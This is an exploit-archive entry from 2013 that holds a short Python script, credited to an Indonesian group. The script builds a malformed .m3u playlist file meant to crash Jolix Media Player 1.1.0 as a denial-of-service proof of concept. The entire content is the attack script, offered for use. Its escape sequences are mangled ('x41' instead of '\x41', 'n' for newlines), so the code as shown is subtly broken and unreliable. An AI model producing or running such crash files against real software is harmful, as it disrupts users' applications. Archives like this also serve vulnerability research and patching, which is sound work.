[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Jolix Media Player 1.1.0 (.m3u) - Denial of Service
# Published : 2013-07-10
# Author :
# Previous Title : XnView 2.03 (.PCT) - Buffer Overflow Vulnerability
# Next Title : DirectShow Arbitrary Memory Overwrite Vulnerability (MS13-056)


#!/usr/bin/python
print """
 [+]Judul Ledakan:Jolix Media Player (.m3u) Denial of Service Exploit
 [+]Celah versi: Version 1.1.0
 [+]Mengunduh produk: http://www.jolixtools.com/downloads/jolix-media-player-setup.exe
 [+]Hari Tanggal Tahun: 09.07.2013
 [+]Penulis: IndonesiaGokilTeam
 [+]Dicoba di sistem operasi: Windows xp sp 3
 """

sampah = "x41" * 1000
ledakan = sampah
  
try:
    rst= open("SampahMasyarakat.m3u",'w')
    rst.write(ledakan)
    rst.close()
    print("nFile Sampah Masyarakat dibuat !n")
except:
    print "Gagal"